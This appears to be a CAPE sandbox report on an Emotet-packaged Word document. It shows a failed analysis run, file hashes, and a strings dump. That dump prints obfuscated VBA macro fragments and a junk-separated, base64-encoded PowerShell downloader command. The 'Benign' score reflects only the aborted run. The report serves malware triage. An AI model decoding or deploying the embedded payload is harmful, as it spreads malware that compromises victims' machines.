Analysis

Category Package Started Completed Duration Log
FILE Emotet 2020-03-24 10:05:10 2020-03-24 10:05:32 22 seconds Show Log
  • Info: Analysis failed: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.
2020-03-24 10:05:11,000 [root] INFO: Date set to: 03-24-20, time set to: 10:05:11, timeout set to: 200
2020-03-24 10:05:11,046 [root] DEBUG: Starting analyzer from: C:\ovptadn
2020-03-24 10:05:11,046 [root] DEBUG: Storing results at: C:\gTeeeM
2020-03-24 10:05:11,046 [root] DEBUG: Pipe server name: \\.\PIPE\gbwwdUTPvA
2020-03-24 10:05:11,046 [root] INFO: Analysis package "Emotet" has been specified.
2020-03-24 10:05:11,904 [root] DEBUG: Started auxiliary module Browser
2020-03-24 10:05:11,904 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 10:05:11,904 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 10:05:12,559 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-03-24 10:05:12,559 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Human
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Usage
2020-03-24 10:05:12,559 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Emotet
2020-03-24 10:05:12,559 [root] INFO: Analyzer: Package modules.packages.Emotet does not specify a DLL_64 option
2020-03-24 10:05:12,605 [lib.api.process] ERROR: Failed to execute process from path "C:\Users\user\AppData\Local\Temp\hLbB899bly.exe" with arguments "None" (Error: This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher (ERROR_EXE_MACHINE_TYPE_MISMATCH))
2020-03-24 10:05:12,605 [root] ERROR: Traceback (most recent call last):
  File "C:\ovptadn\analyzer.py", line 1332, in <module>
    success = analyzer.run()
  File "C:\ovptadn\analyzer.py", line 1151, in run
    "error: {1}".format(package_name, e))
CuckooError: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.
Traceback (most recent call last):
  File "C:\ovptadn\analyzer.py", line 1332, in <module>
    success = analyzer.run()
  File "C:\ovptadn\analyzer.py", line 1151, in run
    "error: {1}".format(package_name, e))
CuckooError: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.

MalScore

0.0

Benign

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 10:05:10 2020-03-24 10:05:31

File Details

File Name d576b437c87c8b69b39dc86e23caded42affb2ef
File Size 241755 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Voluptatem., Author: Elisa Girard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Feb 7 13:40:00 2020, Last Saved Time/Date: Fri Feb 7 13:40:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0
MD5 7184cec4c868d442405cd8d484670ea7
SHA1 4e70cce99a1d69e5a151a65eadb557daad6d9595
SHA256 895a867ebd42a2af802ca3c40609f639e485804548206877754f83ac55468aa6
SHA512 c33d816fc348ead47e3c36d3dcf8a05b5681b4f9681936e80bb12cfd0aac8d49cd0155188682e2c2cb74abbf46655009bfe8c864a7b81c97f5baeeae656aab5e
CRC32 5CC8483A
Ssdeep 6144:Ww0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+BOKEw/zRW:l0E3dxtR/iU9mvUPBCw/zRW
TrID
  • 54.2% (.DOC) Microsoft Word document (32000/1/3)
  • 32.2% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 13.5% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

No signatures


Screenshots

No screenshots available.

Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
bjbj2)2)
CExif
HwquriinscWmtthnrosldajZkumnkrn
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal.dotm
Microsoft Office Word
Title
flufnx
Uwzoqquqbmiv
Acywyscqdjdan
Vffwsmgaqiwk
Jabtaunotart
Jmldgdmc
Ldkqwbeldiwktukq
Fsszhrtvuudh
Egcpqvmymvkh
Qwdazozqcvkh
Microsoft Forms 2.0 Form
edded Object
Bgxfwvfiyfb
Lhafsfau
Hxzvhpvip
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
Attribut
e VB_Nam
e = "Bgx
1Normal.
gp ZocAg
Qr LimjN
qw`WzYTu
SK KnUjw
QLWgWMjE
ZzMDbCl
Hxzvhpvi
p.Zjubqo
Attribut
e VB_Nam
e = "Lha
69439B8-
0E31-436
E-B11C-9
D576952C
C1D}{839
35A3A-65
C6-4AED-
8CBF-D7A
Pr@edecla
0046}#
2.0#0#C:
\Windows
e2.tlb
omation
!G{2DF
8D04C-5B
e32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
3}{33}{3w3}{3i3}{33}{3n3}{3m3}{3g3}{33}{3mt3}{33}{3
:3}{3wi3}{33}{3n33}{33}{33}{323}{33}{3_3}{33}{3
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
Acti
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bAB3
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
3pAG
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
dgB3}{
bsadjllqwe32233dd
gpZocAg
QrLimjN
3}{3
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
3}{3QA
bsadjllqwe32233dd
gpZocAg
QrLimjN
gB4A
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
exxxxx
3}{3$
bsadjllqwe32233dd
gpZocAg
QrLimjN
tfor
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
Acyw
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
Butt
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
kzbwbf
bsadjllqwe32233dd
gpZocAg
QrLimjN
i",q
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
Vthabr
bsadjllqwe32233dd
yot))
gpZocAg
QrLimjN
r.Pr
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
bsadjllqwe32233dd
gpZocAg
QrLimjN
tMnrjXy
bHPciMm
ZzMDbCl
wOCMJmT
EBAHJXf
ineSha
Attribut
e VB_Nam
e = "Hxz
Functio
n Zjubqo
`bsadj
$"aRm
"ZzMDbCl{
" + ChrW
(Lhafsfa@u.Zoom
YLdkqw
wf, Qxo
HKHAuHa
O) / 2
Reeg
lwuyfkr(
Oaxkdts
xhgd + K
kfxyawmz
iMjMFUI
= Len(X
\Int(QLW
sadjllqw
SKKnUjBw
3, ""
zMDbCl
8Lhafsf
au.Egcpq
vmymvk.P
liengco
qwWzYTuY
debug
function
print
Rzonxib
Wpsyxwoeaci
icrosoft
Shared\
OFFICE16
D7-CFF9-
rs\ADMIN
I~1\AppD
ata\Loca
!sHxzvhp@vipG
HE`!z !h
Uffboody
Tahomady
Uuqtndhibbi
Tahomady
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Title
Tahomady
Tahoma
Vqucehlijtuwi
Tahoma
Microsoft Forms 2.0 Frame
Embedded Object
Forms.Frame.1
Microsoft Forms 2.0 Frame
Embedded Object
Forms.Frame.1
Normal.dotm
Microsoft Office Word
Elisa Girard
Voluptatem.
Tgswpluebae.
Tahoma
Microsoft Forms 2.0 Form
Embedded Object
Forms.MultiPage.1
p3}{3o3}{3w3}{3e3}{3r3}{3s3}{3h3}{3eL3}{3L3}{3 3}{3-3}{3e3}{3 JABFA3}{3HYAaQ3}{3B6AGs3}{3AbABy3}{3AGwAP3}{3QAnAF3}{3oAcAB3}{34AGwA3}{3bQBwA3o
}{3GoAZQ3}{3BzAGY3}{3AdQAn3}{3ADsAJ3}{3ABOAG3}{3EAegB3}{3jAHkA3}{3agB0A3}{3GIAdA3}{3BiAGg3}{3AdwBq3}{3ACAAP3}{3QAgAC3}{3cAOAA3}{33ADkA3}{3JwA7A3}{3CQAUA3}{3BqAGk3}{3AZwB63}{3AGcAe3}{3QBpAH3}{3UAawB3}{34AHYA3}{3egA9A3}{3CcATA3}{3B2AHA3}{3AYgBw3}{3AHoAd3}{3QB3AH3}{3EAaAB3}{3sAHkA3}{3JwA7A3}{3CQARA3}{3BqAGE3}{3AYQBv3}{3AHUAc3}{3wB3AG3}{34AYgB3}{3yAGgA3}{3eQA9A3}{3CQAZQ3}{3BuAHY3}{3AOgB13}{3AHMAZ3}{3QByAH3}{3AAcgB3}{3vAGYA3}{3aQBsA3}{3GUAKw3}{3AnAFw3}{3AJwAr3}{3ACQAT3}{3gBhAH3}{3oAYwB3}{35AGoA3}{3dABiA3}{3HQAYg3}{3BoAHc3}{3AagAr3}{3ACcAL3}{3gBlAH3}{3gAZQA3}{3nADsA3}{3JABXA3}{3GkAaA3}{3BpAGo3}{3AawBi3}{3AGQAb3}{3ABsAH3}{3IAPQA3}{3nAFYA3}{3bQBuA3}{3HEAcQ3}{3BrAG03}{3AaABr3}{3AGYAd3}{3gB4AC3}{3cAOwA3}{3kAEsA3}{3cQB2A3}{3GYAbw3}{3B4AHk3}{3AcABl3}{3AHoAP3}{3QAmAC3}{3gAJwB3}{3uAGUA3}{3dwAnA3}{3CsAJw3}{3AtAG83}{3AYgAn3}{3ACsAJ3}{3wBqAG3}{3UAYwB3}{30ACcA3}{3KQAgA3}{3G4ARQ3}{3B0AC43}{3AVwBl3}{3AGIAY3}{3wBMAE3}{3kARQB3}{3OAFQA3}{3OwAkA3}{3EEAbA3}{3BnAHk3}{3AbwB23}{3AHMAb3}{3QBuAG3}{3kAcgB3}{3sAGwA3}{3PQAnA3}{3GgAdA3}{3B0AHA3}{3AOgAv3}{3AC8Ad3}{3ABhAC3}{30AYgB3}{3lAGgA3}{3ZQBzA3}{3GgAdA3}{3AuAGk3}{3AcgAv3}{3AGkAb3}{3QBhAG3}{3cAZQB3}{3zAC8A3}{3UAByA3}{3G8Adg3}{3B4ADA3}{3AMABh3}{3AC8AK3}{3gBoAH3}{3QAdAB3}{3wADoA3}{3LwAvA3}{3HQAYQ3}{3B0AGM3}{3AbwBn3}{3AHIAb3}{3wB1AH3}{3AALgB3}{3pAHIA3}{3LwB3A3}{3HAALQ3}{3BhAGQ3}{3AbQBp3}{3AG4AL3}{3wBVAE3}{3MALwA3}{3qAGgA3}{3dAB0A3}{3HAAOg3}{3AvAC83}{3AdABj3}{3AHAAY3}{3QByAH3}{3QAbgB3}{3lAHIA3}{3LgByA3}{3HUALw3}{3B3AHA3}{3ALQBp3}{3AG4AY3}{3wBsAH3}{3UAZAB3}{3lAHMA3}{3LwBuA3}{3HIAOA3}{3AvACo3}{3AaAB03}{3AHQAc3}{3AA6AC3}{38ALwB3}{30AGUA3}{3cABjA3}{3GkAYQ3}{3BuAC43}{3AdQB03}{3AGMAY3}{3wAuAG3}{3EAYwA3}{3uAHQA3}{3aAAvA3}{3HcAcA3}{3AtAGE3}{3AZABt3}{3AGkAb3}{3gAvAF3}{3MAcQB3}{31AFIA3}{3LwAqA3}{3GgAdA3}{3B0AHA3}{3AOgAv3}{3AC8Ab3}{3wB1AH3}{3IAcAB3}{3yAG8A3}{3ZAB1A3}{3GMAdA3}{3ByAGU3}{3AdgBp3}{3AGUAd3}{3wAuAG3}{3kAbgA3}{3vAHAA3}{3bwBrA3}{3GoAYg3}{3BnADc3}{3ANAA23}{3AGkAa3}{3AByAH3}{3QAcgA3}{3vAGEA3}{3MQBrA3}{3HoAdw3}{3BjAC83}{3AJwAu3}{3ACIAc3}{3wBQAG3}{3AAbAB3}{3JAFQA3}{3IgAoA3}{3FsAYw3}{3BoAGE3}{3AcgBd3}{3ADQAM3}{3gApAD3}{3sAJAB3}{3NAHIA3}{3eQBuA3}{3GkAaA3}{3BxAHg3}{3AYwBx3}{3AG4Ac3}{3AA9AC3}{3cASAB3}{3rAGQA3}{3awB6A3}{3GgAeg3}{3BrAGM3}{3AcgB23}{3ACcAO3}{3wBmAG3}{38AcgB3}{3lAGEA3}{3YwBoA3}{3CgAJA3}{3BYAGg3}{3AaQBw3}{3AHMAd3}{3gB3AH3}{3AAIAB3}{3pAG4A3}{3IAAkA3}{3EEAbA3}{3BnAHk3}{3AbwB23}{3AHMAb3}{3QBuAG3}{3kAcgB3}{3sAGwA3}{3KQB7A3}{3HQAcg3}{3B5AHs3}{3AJABL3}{3AHEAd3}{3gBmAG3}{38AeAB3}{35AHAA3}{3ZQB6A3}{3C4AIg3}{3BkAE83}{3AdwBu3}{3AEwAY3}{3ABPAG3}{3AAQQB3}{3EAEYA3}{3SQBsA3}{3GUAIg3}{3AoACQ3}{3AWABo3}{3AGkAc3}{3ABzAH3}{3YAdwB3}{3wACwA3}{3IAAkA3}{3EQAag3}{3BhAGE3}{3AbwB13}{3AHMAd3}{3wBuAG3}{3IAcgB3}{3oAHkA3}{3KQA7A3}{3CQASg3}{3BtAGM3}{3AbABr3}{3AGoAc3}{3QBwAD3}{30AJwB3}{3YAGkA3}{3aQBhA3}{3HgAaw3}{3B3AGM3}{3AYQB33}{3ACcAO3}{3wBJAG3}{3YAIAA3}{3oACgA3}{3LgAoA3}{3CcARw3}{3BlAHQ3}{3AJwAr3}{3ACcAL3}{3QBJAC3}{3cAKwA3}{3nAHQA3}{3ZQBtA3}{3CcAKQ3}{3AgACQ3}{3ARABq3}{3AGEAY3}{3QBvAH3}{3UAcwB3}{33AG4A3}{3YgByA3}{3GgAeQ3}{3ApAC43}{3AIgBM3}{3AGUAY3}{3ABOAG3}{3cAVAB3}{3oACIA3}{3IAAtA3}{3GcAZQ3}{3AgADM3}{3ANwA03}{3ADMAM3}{3gApAC3}{3AAewA3}{3oAFsA3}{3dwBtA3}{3GkAYw3}{3BsAGE3}{3AcwBz3}{3AF0AJ3}{3wB3AG3}{3kAbgA3}{3zADIA3}{3XwBQA3}{3HIAbw3}{3BjAGU3}{3AcwBz3}{3ACcAK3}{3QAuAC3}{3IAQwB3}{3SAEUA3}{3YABBA3}{3FQAZQ3}{3AiACg3}{3AJABE3}{3AGoAY3}{3QBhAG3}{38AdQB3}{3zAHcA3}{3bgBiA3}{3HIAaA3}{3B5ACk3}{3AOwAk3}{3AEMAa3}{3wB4AH3}{3MAdQB3}{3jAG8A3}{3aABzA3}{3HQAYw3}{3BoAGw3}{3APQAn3}{3AEMAZ3}{3wB4AG3}{3EAdgB3}{34AGYA3}{3YgByA3}{3CcAOw3}{3BiAHI3}{3AZQBh3}{3AGsAO3}{3wAkAF3}{3oAZwB3}{3vAHYA3}{3cgBoA3}{3GoAbQ3}{3A9ACc3}{3ATQBx3}{3AHYAb3}{3gB4AG3}{3YAZgB3}{3vACcA3}{3fQB9A3}{3GMAYQ3}{3B0AGM3}{3AaAB73}{3AH0Af3}{3QAkAE3}{30AbAB3}{3yAHoA3}{3dAB6A3}{3HYAZQ3}{3BjAHc3}{3AagBn3}{3AD0AJ3}{3wBDAG3}{3kAcwB3}{33AGMA3}{3dgB4A3}{3HkAeg3}{3BlAHE3}{3AcQAn3}{3AA==
Page2o3}
Tahoma
Page1
Page2
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1
Vthabrrznx
Tahoma
Cpsgvhexxxxxa
Fzhyijaoui
Picture 1
Fzhyijaoui
Normal
Default Paragraph Font
Table Normal
No List
Times New Roman
Symbol
Arial
Calibri
Calibri Light
Cambria Math
CompObj
SummaryInformation
DocumentSummaryInformation
Macros
Bgxfwvfiyfb
__SRP_2
__SRP_3
Lhafsfau
bBgxfwvfiyfb
uLhafsfau
pHxzvhpvip
PROJECT
CompObj
Hxzvhpvip
_VBA_PROJECT
__SRP_0
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{71B8D0D7-CFF9-4CBC-9DED-F13C852D434A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
__SRP_1
Lhafsfau
CompObj
CompObj
Root Entry
1Table
WordDocument
CompObj
CompObj
CompObj
VBFrame
PROJECTwm
This file is not on VirusTotal.

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 0.434 seconds )

  • 0.112 CAPE
  • 0.11 TargetInfo
  • 0.106 TrID
  • 0.082 NetworkAnalysis
  • 0.017 Strings
  • 0.006 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.044 seconds )

  • 0.008 ransomware_files
  • 0.007 antiav_detectreg
  • 0.003 persistence_autorun
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 masquerade_process_name

Reporting ( 0.0 seconds )

Task ID 131473
Mongo ID 5e79db700986a12c9f6d5f5f
Cuckoo release 1.3-CAPE
Delete